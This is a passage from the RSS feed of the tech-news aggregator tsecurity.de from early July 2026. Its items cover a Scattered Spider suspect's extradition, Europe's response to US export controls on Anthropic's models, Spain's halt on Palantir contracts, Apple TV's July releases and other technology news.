<p data-start="3905" data-end="4130">U.S. Attorney Andrew S. Boutros said the alleged attacks caused significant disruption to businesses across the United States and emphasized the government's commitment to prosecuting individuals involved in cyber intrusions.</p>
<p data-start="4132" data-end="4357">FBI Special Agent-in-Charge Douglas S. DePodesta also highlighted the role of international law enforcement partnerships in identifying alleged members of the <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-hacking/" title="hacking" data-wpil-keyword-link="linked" data-wpil-monitor-id="28892">hacking</a> group and pursuing cross-border cybercrime investigations.</p>

<h3 data-section-id="1eggqu1" data-start="4359" data-end="4408"><strong><span role="text">Recent Guidance on Scattered Spider Threat</span></strong></h3>
<p data-start="4410" data-end="4694">The arrest follows recent law enforcement efforts targeting the Scattered Spider threat group. In July 2025, the <a href="https://thecyberexpress.com/fbi-cisa-warn-about-scattered-spider/" target="_blank" rel="noopener">FBI and CISA released updated</a> guidance describing the group's latest attack techniques, including the use of <a href="https://thecyberexpress.com/lockbit-and-dragonforce-ransomware-binary/" target="_blank" rel="noopener">DragonForce ransomware </a>to encrypt VMware ESXi servers.</p>
<p data-start="4696" data-end="4894">The advisory urged organizations to maintain isolated offline backups, implement phishing-resistant <a href="https://thecyberexpress.com/phishing-attacks/" target="_blank" rel="noopener">multifactor authentication</a> (MFA), and apply application controls to manage software execution.</p>
<p data-start="4896" data-end="5134">Separately, in November 2025, <a href="https://thecyberexpress.com/scattered-spider-teens-plead-not-guilty/" target="_blank" rel="nofollow noopener">two alleged Scattered Spider members</a> appeared before Southwark Crown Court in the United Kingdom and pleaded not guilty to charges related to the August 2024 <a href="https://thecyberexpress.com/transport-for-london-cyberattack-plead-guilty/" target="_blank" rel="noopener">cyberattack on </a>Transport for London (TfL).</p>
<p data-start="5136" data-end="5326">The Department of Justice emphasized that the complaint against Stokes contains allegations only. As with all criminal cases, he is presumed innocent unless and until proven guilty in court.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges]]></title>
<description><![CDATA[Swati KhandelwalJul 01, 2026Cybercrime / Ransomware A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1. Peter Stokes, 19, a d...]]></description>
<link>https://tsecurity.de/de/3640068/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640068/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</guid>
<pubDate>Thu, 02 Jul 2026 05:22:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Swati KhandelwalJul 01, 2026Cybercrime / Ransomware A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1. Peter Stokes, 19, a dual U.S. and Estonian citizen, appeared in a Chicago federal court on […]]]></content:encoded>
</item>
<item>
<title><![CDATA[19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges]]></title>
<description><![CDATA[A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1. Peter Stokes, 19, a dual U.S. and…
Read more →
The post 19-Year-Old Scatter...]]></description>
<link>https://tsecurity.de/de/3639623/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639623/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</guid>
<pubDate>Wed, 01 Jul 2026 22:23:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1. Peter Stokes, 19, a dual U.S. and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/19-year-old-scattered-spider-suspect-extradited-to-face-u-s-hacking-charges/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/19-year-old-scattered-spider-suspect-extradited-to-face-u-s-hacking-charges/">19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges]]></title>
<description><![CDATA[A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1.

Peter Stokes, 19, a dual U.S. and Estonian citizen, appeared in a Chicago ...]]></description>
<link>https://tsecurity.de/de/3639588/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639588/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</guid>
<pubDate>Wed, 01 Jul 2026 22:06:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1.

Peter Stokes, 19, a dual U.S. and Estonian citizen, appeared in a Chicago federal court on June 30, where a judge ordered him held in custody.

Finnish police]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV July 2026: Every New Show and Movie Coming This Month]]></title>
<description><![CDATA[Apple TV July is packed with new and returning titles, including Silo Season 3, Trying Season 5, Lucky, The Dink, and a new Snoopy special. The July lineup starts on Friday, July 3, and continues through Friday, July 31, with sci-fi, comedy, thriller, sports comedy, and family animation.



Here’...]]></description>
<link>https://tsecurity.de/de/3639408/ios-mac-os/apple-tv-july-2026-every-new-show-and-movie-coming-this-month/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639408/ios-mac-os/apple-tv-july-2026-every-new-show-and-movie-coming-this-month/</guid>
<pubDate>Wed, 01 Jul 2026 20:22:30 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV July is packed with new and returning titles, including Silo Season 3, Trying Season 5, Lucky, The Dink, and a new Snoopy special. The July lineup starts on Friday, July 3, and continues through Friday, July 31, with sci-fi, comedy, thriller, sports comedy, and family animation.



Here’s everything coming to Apple TV in July, along with the release date, cast, episode details, and what to expect.



1. Silo Season 3








Episodes: 10 episodes



Start date: July 3, 2026



Finale date: September 4, 2026



Genre: Sci-fi drama



Cast: Rebecca Ferguson, Common, Harriet Walter, Chinaza Uche, Jessica Henwick, Ashley Zukerman




Plot



Season 3 continues Juliette’s story after her forced cleaning, while the silo deals with rebellion and a new danger. The season also goes back to the “Before Times,” where Helen Drew and Daniel Keene uncover a conspiracy that changes everything.



2. Trying Season 5








Episodes: 8 episodes



Start date: July 8, 2026



Finale date: August 26, 2026



Genre: Comedy



Cast: Esther Smith, Rafe Spall, Scarlett Rayner, Cooper Turner, Charlotte Riley




Plot



Nikki and Jason’s family life gets complicated when Princess and Tyler’s biological mother, Kat, arrives at their doorstep. The new season follows the chaos, emotions, and pressure this brings into their home.



3. The Charlie Brown and Snoopy Show



This guide will help you stream "A Charlie Brown Christmas" on Apple TV+. (Photo Credit: Apple.)




Episodes: 18 episodes



Start date: July 10, 2026



Genre: Kids and family animation



Cast: Peanuts characters




Plot



The classic Peanuts series follows Charlie Brown, Snoopy, and the gang through everyday problems, funny moments, and Snoopy’s wild imagination. It brings older Peanuts stories to Apple TV for family viewing.



4. Lucky








Episodes: Limited series



Start date: July 15, 2026



Finale date: August 19, 2026



Genre: Drama, action, thriller



Cast: Anya Taylor-Joy, Annette Bening, Timothy Olyphant, Aunjanue Ellis-Taylor, Drew Starkey




Plot



Lucky follows a con artist who goes on the run after a multimillion-dollar heist goes wrong. With the FBI and a dangerous crime boss chasing her, she has to face her past while trying to survive.



5. The Dink








Duration: Movie



Release date: July 24, 2026



Genre: Comedy, sports



Cast: Jake Johnson, Ed Harris, Mary Steenburgen, Andy Roddick, Patton Oswalt, Chloe Fineman, Ben Stiller




Plot



Dusty Boyd is a washed-up tennis pro who starts playing pickleball after an old injury keeps him away from tennis. What begins as rehab turns into a fight for his father’s approval, his club’s future, and his own identity.



6. Snoopy Presents: There’s No Place Like Home, Snoopy




Duration: Special



Release date: July 31, 2026



Genre: Kids and family



Cast: Riley Vargas, Terry McGurrin, Rob Tinkler, Kitai O’Garro, Josephine Nisbett




Plot



Snoopy is heartbroken after his doghouse is accidentally sold at a yard sale. Charlie Brown tries to help him find it, and their journey turns into a sweet story about what makes a place feel like home.



Final Thoughts



Apple TV July gives viewers a strong mix of returning favorites, new thrillers, comedy, and family-friendly Peanuts titles. In the US, Apple TV costs $12.99 per month after a 7-day free trial.



What do you plan to watch first on Apple TV this July? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Europe looks to fight any forced shutdown of AI]]></title>
<description><![CDATA[It was one of the biggest tech headlines in June: Amid the race leading up to the initial public offerings (IPOs) of artificial intelligence (AI) giants, the United States used its “blocking card” to disable Anthropic’s latest models. Citing national security concerns, the Trump Administration fo...]]></description>
<link>https://tsecurity.de/de/3639197/it-nachrichten/europe-looks-to-fight-any-forced-shutdown-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639197/it-nachrichten/europe-looks-to-fight-any-forced-shutdown-of-ai/</guid>
<pubDate>Wed, 01 Jul 2026 18:48:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>It was one of the biggest tech headlines in June: Amid the race leading up to the initial public offerings (IPOs) of artificial intelligence (AI) giants, the United States used its “blocking card” to disable <a href="https://www.cio.com/article/4185175/anthropic-locks-enterprises-out-of-fable-and-mythos-following-government-order.html" target="_blank">Anthropic’s latest models</a>. Citing national security concerns, the Trump Administration forced the company to prevent non-U.S. citizens (even in the US) from using its most advanced models — the very ones it had just unveiled. Speculation suggests the same thing could happen to OpenAI.</p>



<p>The ban on Anthropic was not <a href="https://www.computerworld.com/article/4191565/us-reverses-export-restrictions-on-anthropics-fable-5-mythos-5-ai-models-2.html">lifted until June 30</a>. The US administration said that, in the intervening weeks, it had worked with the company to “review and approve Fable5 to ensure it aligns with the US government and strengthens US leadership in AI.” For its part, OpenAI confirmed that its next major launch would begin with a preview for “trusted partners ”—a list it has shared with the US government.</p>



<p>Are these companies falling victim to their own marketing — having touted that their models are becoming increasingly intelligent and potentially more dangerous? Or are they collateral damage in an uncertain geopolitical world? Whatever the rationale, the recent moves raise questions in Europe, where <a href="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html" data-type="link" data-id="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html">digital sovereignty movements are on the rise</a>.</p>



<p>The sudden shutdown of Fable 5 and Mythos 5 for European companies had a limited direct impact, because the models were so new. As Fernando Maldonado, senior analyst at Foundry Spain, noted: “Hardly anyone here had even started using them yet.” The indirect impact is more far-reaching, because it shows that a forced technological blackout is possible and that Europe has a limited margin for response.</p>



<p>The doomsday scenarios warn that Europe could be headed for a future tech disaster that will have a domino effect on the economy and society. That’s the conclusion of the <a href="https://europe2031.ai/" target="_blank" rel="noreferrer noopener"><em>“Europe 2031”</em></a> report, prepared by a group of European AI researchers, analysts, and investors. “The current trajectory of AI calls for the most ambitious political agenda in the history of postwar Europe,” the report concludes. They argue that Europe has failed to grasp the scale of AI ‘s spread and warn that Europe couldl fall into irrelevance. (The group estimates that, in that scenario, the continent would control only 5% of AI computing by 2031, compared to 80% for the US). There is <a href="https://www.computerworld.com/article/4181816/eu-takes-first-steps-to-reduce-reliance-on-us-hyperscalers.htm" data-type="link" data-id="https://www.computerworld.com/article/4181816/eu-takes-first-steps-to-reduce-reliance-on-us-hyperscalers.htm">much talk of sovereignty</a>, but little real-world action so far.</p>



<p>That dystopian vision of the future coexists with other, more nuanced perspectives. But analysts and political scientists point out that AI could yet become an economic and political lever that will shape the future balance of power.</p>



<h2 class="wp-block-heading">The ‘kill switch’ scenario</h2>



<p>The total shutdown “kill switch” option, deemed impossible not so long ago, has established itself as one of the real potential fears in geopolitical risk: it was on the agenda at <a href="https://www.euronews.com/my-europe/2026/06/17/ai-takes-centre-stage-at-g7-as-western-fears-over-us-kill-switch-get-real" target="_blank" rel="noreferrer noopener">the recent G7 meeting</a>. The Anthropic case was seen as a warning. “Technology is increasingly a strategic asset. Europe must be able to act on its own terms,” European Commission spokesperson Thomas Regnier told <em>Euronews</em>. <a href="https://www.reuters.com/legal/litigation/eu-commission-looking-practical-consequences-anthropic-decision-spokesperson-2026-06-14/" target="_blank" rel="noreferrer noopener">Speaking to Reuters</a>, he added, “This event is further proof that Europe must strengthen its technological sovereignty.”</p>



<p>The Anthropic outage “has given ammunition to those who have been calling for investment in technological sovereignty and highlights this geopolitical situation,” said <a href="https://es.linkedin.com/in/beatrizariasg" data-type="link" data-id="https://es.linkedin.com/in/beatrizariasg" target="_blank" rel="noreferrer noopener">Beatriz Arias</a>, director of digital transformation at DigitalES. Arias believes the incident shows that today’s reality requires work in more areas; it is no longer enough to manage telecommunications or standards. Other issues such as interoperability and intellectual property are on the table, as well as “the need to invest more in our own capabilities, without prejudice to our continued commitment to an open model of cooperation and alliances.”</p>



<p>That said, Darío García de Viedma, a researcher in Technology and Digital Policy at the Elcano Royal Institute, does not believe the feared kill switch will be used, “because the US  technology export model depends on companies. Companies are the strong arm of US diplomacy in the technological sphere.” For them to play that tole, they need a global presence. But he does agree that what happened with Anthropic helps “explain this risk to the public” — and incidentally showcase what technological sovereignty is.</p>



<p>Even if a catastrophic blackout doesn’t occur, other problems could still hinder access. Political scientist Amélie Férey explained on <a href="https://www.radiofrance.fr/franceculture/podcasts/l-invite-e-des-matins/guerre-au-moyen-orient-a-qui-profite-cet-accord-7310775" target="_blank" rel="noreferrer noopener"><em>France Culture</em></a> how license prices could gradually rise and drive up costs. Or access to certain features could be gradually restricted. As García de Viedma put it, a moratorium on model access would create a “temporal asymmetry.” Disruptions can occur in “the complex supply chain behind all our technology,” through export controls (something now happening in the chip market) or through the degradation of essential services (such as what could happen with Starlink coverage).</p>



<p>In recent years, the European Union has entered a race in that arena, one that involves symbolic measures well as practical legislative moves. The European Parliament has <a href="https://www.politico.eu/article/european-parliament-ditches-google-for-french-search-engine/" target="_blank" rel="noreferrer noopener">dropped Google as its default search engine</a> and replaced it with the French Qwant. And in early June, the Commission presented its <a href="https://commission.europa.eu/news-and-media/news/strengthening-europes-tech-sovereignty-2026-06-03_en" target="_blank" rel="noreferrer noopener">European Technology Sovereignty Package</a>, which <a href="https://www.computerworld.com/article/4169676/the-european-commission-is-considering-rules-that-would-restrict-u-s-cloud-services.html">addresses, among other issues, AI</a>. They aim to ensure that Europe becomes “a continent of AI, strengthen its digital autonomy, and help build a more sustainable digital future,” while also acknowledging Europe’s technological dependence.</p>



<p>“We cannot afford to depend on others for the technologies that keep our hospitals running, our energy grids stable, and our services secure,” said Commission President Ursula von der Leyen. Specifically, Europe aims to triple the capacity of its data centers over the next five to seven years, boost the adoption of AI, enhance research and innovation, and work on its own development and deployment efforts. The package will now have to go through an approval process to become law and take effect.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/P-069883_00-02_01-ORIGINAL-271239.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Henna Virkkunen y Dan Jørgensen, en la presentación del paquete de soberanía tecnológica de la UE el pasado 3 de junio" class="wp-image-4191473" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p><strong>Henna Virkkunen and Dan Jørgensen at the presentation of the EU’s technological sovereignty package on June 3.</strong></p>
</figcaption></figure><p class="imageCredit">UE</p></div>



<h2 class="wp-block-heading">Has Europe done enough?</h2>



<p>The big question is whether what Europe has done — and what it plans to do — will be enough. Are the sovereignty packages sufficient, or are they vague and lacking in concrete details? The Europe 2031 group accuses Europe of making empty promises that don’t translate into tangible results.</p>



<p>García de Viedma said the latest package represents “good progress, which is defining technological sovereignty as risk mitigation.” In this case, risk has three aspects: technological dependence could be used as a coercive measure; tech operations could be disrupted “if at any point our alliances deteriorate;” and IT could be used as a tool for surveillance. </p>



<p>“Not to sound like conspiracy theorists, but the fact is that there is a possibility that whoever controls the communication nodes and software has the ability to see, if not everything, then at least some things,” he said. “That gives them an advantage.” Therefore, sovereignty is not so much “that identity-based vision” but rather one of “risk avoidance.” It’s not about using European technology simply because it’s European, but about understanding the risks of not using it.</p>



<p>Viedma believes the Commission has accurately identified today’s problems (such as governance or the digitization of the power grid, “the main bottleneck for AI”) but wonders about the future. Added to this is the issue of money: investment is a key piece in this chess game.</p>



<p>DigitalES views the efforts currently under way — such as those regarding European chips — favorably. “What’s needed is more determination and focus,” said Arias. Incidents like the Anthropic case can “help move in that direction.” While European investment plans in AI may seem less grandiose than those of the sector’s major companies, Arias warned against defeatist rhetoric. <br></p>



<p>“The EU is doing what it needs to do,” he said, and is creating “a more geopolitically stable environment for investors. Ultimately, this is about the market and who creates the most value.” European regulations can eventually become global standards, with Europe positioning itself “as an attractive partner for investment” — one that is “reliable and more predictable.”</p>



<p>Arias said the key lies not in complete autonomy, but in finding a balance. “We don’t have to produce 100% of what we use, and we shouldn’t depend 100% on a single supplier or jurisdiction.” What’s needed is technological diplomacy, being able to navigate complex waters and safeguard interests.</p>



<p>Playing by different rules in the global AI market is not feasible. “You must be aware of your strengths and weaknesses.” And she insists: “Europe is by no means a long shot — quite the opposite, because it offers certain guarantees.”</p>



<h2 class="wp-block-heading">The next great revolution</h2>



<p>Europe is late to the AI race, but it can still “assume a certain leadership role,” depending on how the sector evolves, as García de Viedma notes. Europe can carve out its own niche and investments are being made and efforts are under way to do so. In AI, this involves identifying areas of European specialization.</p>



<p>There remains a lot of work to be done and, possibly, lessons learned from past experiences to face what lies ahead. AI issues are part of a very complex reality. Arias warned of the need to prepare for “the convergence of artificial intelligence with the computing power that quantum computing will provide” featuring “dual-use technology that will be employed for both military and civilian purposes.” These will be more powerful tools that “require a more solid foundation.</p>



<p>“Such technological diplomacy will be necessary to negotiate global quantum standards, protect intellectual property, and address the potential impact on national security.”</p>



<p>The quantum revolution is imminent, but has yet to unfold, and Europe can capitalize on <a href="https://www.computerworld.es/article/4067287/especial-tecnologia-cuantica-2025.html">it</a>. “Europe is jumping on this bandwagon,” argued Arias, highlighting the investments and work on quantum capabilities. “We’re in a very different situation than we were with the cloud and artificial intelligence.” The EU is “acting quickly” and opening the door to “positioning ourselves country by country.” </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Palantir Crash Accelerating: Spain Stops Contracts]]></title>
<description><![CDATA[Spain has instructed state-linked strategic companies to stop signing contracts with Palantir. El Confidencial reported that Moncloa conveyed informal instructions to companies controlled by the Sociedad Estatal de Participaciones Industriales (SEPI), including Telefonica, Indra, and Navantia, to...]]></description>
<link>https://tsecurity.de/de/3639153/it-security-nachrichten/palantir-crash-accelerating-spain-stops-contracts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639153/it-security-nachrichten/palantir-crash-accelerating-spain-stops-contracts/</guid>
<pubDate>Wed, 01 Jul 2026 18:23:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Spain has instructed state-linked strategic companies to stop signing contracts with Palantir. El Confidencial reported that Moncloa conveyed informal instructions to companies controlled by the Sociedad Estatal de Participaciones Industriales (SEPI), including Telefonica, Indra, and Navantia, to avoid new Palantir contracts over fears about the use of sensitive information linked to national security. Spain’s Ministry … <a href="https://www.flyingpenguin.com/palantir-crash-accelerating-spain-stops-contracts/" class="more-link">Continue reading <span class="screen-reader-text">Palantir Crash Accelerating: Spain Stops Contracts</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[We can live without AI, but can we live without clean water? | Letters]]></title>
<description><![CDATA[Readers respond to an article about Erin Brockovich’s battle against datacentres and voice their fears for the environment What are the benefits obtained from AI’s massive use of electricity and water (‘We’re up against forces that have all the money in the world’: Erin Brockovich on her battle a...]]></description>
<link>https://tsecurity.de/de/3639151/ai-nachrichten/we-can-live-without-ai-but-can-we-live-without-clean-water-letters/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639151/ai-nachrichten/we-can-live-without-ai-but-can-we-live-without-clean-water-letters/</guid>
<pubDate>Wed, 01 Jul 2026 18:19:07 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Readers respond to an article about Erin Brockovich’s battle against datacentres and voice their fears for the environment </p><p>What are the benefits obtained from AI’s massive use of electricity and water (<a href="https://www.theguardian.com/environment/2026/jun/29/were-up-against-forces-that-have-all-the-money-in-the-world-erin-brockovich-on-her-battle-against-ai-datacentres">‘We’re up against forces that have all the money in the world’: Erin Brockovich on her battle against AI datacentres, 29 June</a>)? Analysis shows that <a href="https://hbr.org/2026/06/how-people-are-really-using-ai-in-2026">the top four uses of AI</a> are “therapy/companionship”, “technical assistance and troubleshooting”, “fun and nonsense”, and “fan fiction and storytelling”.</p><p>AI use for therapy, and due to loneliness, appears not to reduce loneliness. AI provides affirmation, but at the expense of reducing the social skills needed to interact in the real world. Teachers report that students’ use of AI <a href="https://www.theguardian.com/technology/2026/apr/02/pupils-england-losing-thinking-skills-because-of-ai-survey">reduces their capacity for critical thinking</a>.</p> <a href="https://www.theguardian.com/technology/2026/jul/01/we-can-live-without-ai-but-can-we-live-without-clean-water">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s aggressive crackdown on iPhone 18 Pro leaks sparks conspiracy theories and highlights supply chain vulnerabilities]]></title>
<description><![CDATA[Videos purportedly showing the iPhone 18 Pro have vanished from social media platforms almost as quickly as they appeared. Apple seems…
The post Apple’s aggressive crackdown on iPhone 18 Pro leaks sparks conspiracy theories and highlights supply chain vulnerabilities appeared first on MacDailyNews.]]></description>
<link>https://tsecurity.de/de/3638810/ios-mac-os/apples-aggressive-crackdown-on-iphone-18-pro-leaks-sparks-conspiracy-theories-and-highlights-supply-chain-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638810/ios-mac-os/apples-aggressive-crackdown-on-iphone-18-pro-leaks-sparks-conspiracy-theories-and-highlights-supply-chain-vulnerabilities/</guid>
<pubDate>Wed, 01 Jul 2026 16:25:30 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Videos purportedly showing the iPhone 18 Pro have vanished from social media platforms almost as quickly as they appeared. Apple seems…</p>
<p>The post <a href="https://macdailynews.com/2026/07/01/apples-aggressive-crackdown-on-iphone-18-pro-leaks-sparks-conspiracy-theories-and-highlights-supply-chain-vulnerabilities/">Apple’s aggressive crackdown on iPhone 18 Pro leaks sparks conspiracy theories and highlights supply chain vulnerabilities</a> appeared first on <a href="https://macdailynews.com/">MacDailyNews</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic: US has lifted export controls on Fable and Mythos AI models after security risk fears]]></title>
<description><![CDATA[The AI company was forced earlier this month to suspend access to its Fable 5 and Mythos 5 models for all foreign nationalsAnthropic has said the US commerce department has lifted export controls on its Fable and Mythos AI models, less than ⁠three weeks after ⁠the company ​was ordered to suspend ...]]></description>
<link>https://tsecurity.de/de/3637233/ai-nachrichten/anthropic-us-has-lifted-export-controls-on-fable-and-mythos-ai-models-after-security-risk-fears/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637233/ai-nachrichten/anthropic-us-has-lifted-export-controls-on-fable-and-mythos-ai-models-after-security-risk-fears/</guid>
<pubDate>Wed, 01 Jul 2026 04:03:20 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The AI company was forced earlier this month to suspend access to its Fable 5 and Mythos 5 models for all foreign nationals</p><p>Anthropic has said the US commerce department has lifted export controls on its Fable and Mythos AI models, less than ⁠three weeks after ⁠the company ​was ordered to suspend access to its most advanced AI models over national security risks.</p><p>“We’ll begin restoring access tomorrow,” Anthropic said in a statement on X late on Tuesday.</p> <a href="https://www.theguardian.com/technology/2026/jul/01/anthropic-fable-mythos-ai-models-us-export-controls-lifted">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rocky week for AI as shares slump but no sign of crash – yet]]></title>
<description><![CDATA[The markets are souring on artificial intelligence, but is this the bubble being burst? Meanwhile, California proposes a tax on billionairesHello, and welcome to TechScape. I’m Blake Montgomery, US tech editor at the Guardian, writing to you after fending off sunburns at the beach. Today, we’re d...]]></description>
<link>https://tsecurity.de/de/3635726/ai-nachrichten/rocky-week-for-ai-as-shares-slump-but-no-sign-of-crash-yet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635726/ai-nachrichten/rocky-week-for-ai-as-shares-slump-but-no-sign-of-crash-yet/</guid>
<pubDate>Tue, 30 Jun 2026 15:19:04 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The markets are souring on artificial intelligence, but is this the bubble being burst? Meanwhile, California proposes a tax on billionaires</p><p>Hello, and welcome to TechScape. I’m Blake Montgomery, US tech editor at the Guardian, writing to you after fending off sunburns at the beach. Today, we’re discussing a rocky week for the AI industry’s finances and how California’s proposed billionaire’s tax is changing the political posture of the state’s governor.</p><p><a href="https://www.theguardian.com/uk-news/2026/jun/15/effects-uk-social-media-ban-under-16s-enforcement">Impact of social media ban for under-16s in UK hinges on how firm it is</a></p><p><a href="https://www.theguardian.com/uk-news/2026/jun/15/uk-under-16s-social-media-ban-how-will-it-work">UK under-16s social media ban: which apps will be blocked and how will it work?</a></p><p><a href="https://www.theguardian.com/world/2026/jun/28/tech-firms-are-losing-the-public-social-media-age-bans-near-tipping-point">‘Tech firms are losing the public’: social media age bans near tipping point</a></p><p><a href="https://www.theguardian.com/technology/2026/jun/26/openai-ai-model-release-trump-us-sam-altman-gpt-anthropic-mythos">OpenAI staggers AI model release after Trump administration request</a></p><p><a href="https://www.theguardian.com/technology/2026/jun/24/meta-pauses-employee-tracker-for-ai-training-amid-privacy-concerns">Meta pauses employee tracker for AI training amid privacy concerns</a></p><p><a href="https://www.theguardian.com/us-news/2026/jun/28/government-website-visitor-tracking-surveillance-fears">‘It’s dangerous and it’s going to erode trust’: redesign of US government websites stokes surveillance fears</a></p><p><a href="https://www.theguardian.com/technology/2026/jun/25/california-billionaire-tax-ballot">California billionaire tax will appear on ballot after deadline for deal passes | Technology | The Guardian</a></p> <a href="https://www.theguardian.com/technology/2026/jun/30/artificial-intelligence-shares">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Global workers eying exits as pay stalls and job fears grow, finds report]]></title>
<description><![CDATA[The 2026 Workplace Trends Report highlights how companies, their leaders and employees are more selective in their expectations.
Read more: Global workers eying exits as pay stalls and job fears grow, finds report]]></description>
<link>https://tsecurity.de/de/3635533/it-nachrichten/global-workers-eying-exits-as-pay-stalls-and-job-fears-grow-finds-report/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635533/it-nachrichten/global-workers-eying-exits-as-pay-stalls-and-job-fears-grow-finds-report/</guid>
<pubDate>Tue, 30 Jun 2026 14:18:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The 2026 Workplace Trends Report highlights how companies, their leaders and employees are more selective in their expectations.</p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/careers/global-workers-eying-exits-pay-stalls-job-fears-growth-report">Global workers eying exits as pay stalls and job fears grow, finds report</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Heavy corporate AI spenders add staff faster than peers]]></title>
<description><![CDATA[Study of 22,000 US companies challenges fears that generative AI will trigger broad job losses]]></description>
<link>https://tsecurity.de/de/3634504/ai-nachrichten/heavy-corporate-ai-spenders-add-staff-faster-than-peers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634504/ai-nachrichten/heavy-corporate-ai-spenders-add-staff-faster-than-peers/</guid>
<pubDate>Tue, 30 Jun 2026 06:17:18 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Study of 22,000 US companies challenges fears that generative AI will trigger broad job losses]]></content:encoded>
</item>
<item>
<title><![CDATA[Large Hadron Collider goes offline to make room for its enhanced successor]]></title>
<description><![CDATA[The High-Luminosity LHC will be mostly the same machine, but it'll deliver 10 times the luminosity and just as little chance of destroying the universe - sorry, conspiracy theorists]]></description>
